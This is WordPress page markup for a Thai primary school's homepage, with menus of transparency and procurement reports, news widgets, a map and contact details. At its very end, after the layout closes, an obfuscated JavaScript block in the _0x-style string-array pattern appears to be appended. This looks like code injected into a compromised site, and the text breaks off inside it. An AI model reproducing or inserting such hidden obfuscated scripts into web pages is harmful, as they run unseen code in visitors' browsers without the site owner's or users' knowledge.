poster=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/Untitled.png\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/สุขาดี.mp4\"></video></figure>\n<!-- /wp:video -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid --></div>\n<!-- /wp:group -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#6096b4\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>โครงสร้าง</strong></td></tr><tr><td><strong>ข้อมูลผู้บริหาร</strong></td></tr><tr><td><strong>อำนาจหน้าที่</strong></td></tr><tr><td><strong>ข้อมูลการติดต่อ</strong></td></tr><tr><td><strong>ข่าวประชาสัมพันธ์</strong></td></tr><tr><td><strong>Q&amp;A</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong>E-Service</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#00000000\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleWeight\":\"500\",\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingBgColor\":\"#eee9da\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนบ้านหนองปลาเข็ง-กอไหล่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">ตำบล โพธิ์ อำเภอ โนนคูณ ศรีสะเกษ 33250</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 045-660157</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2FbannongpakhaengSchool%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const 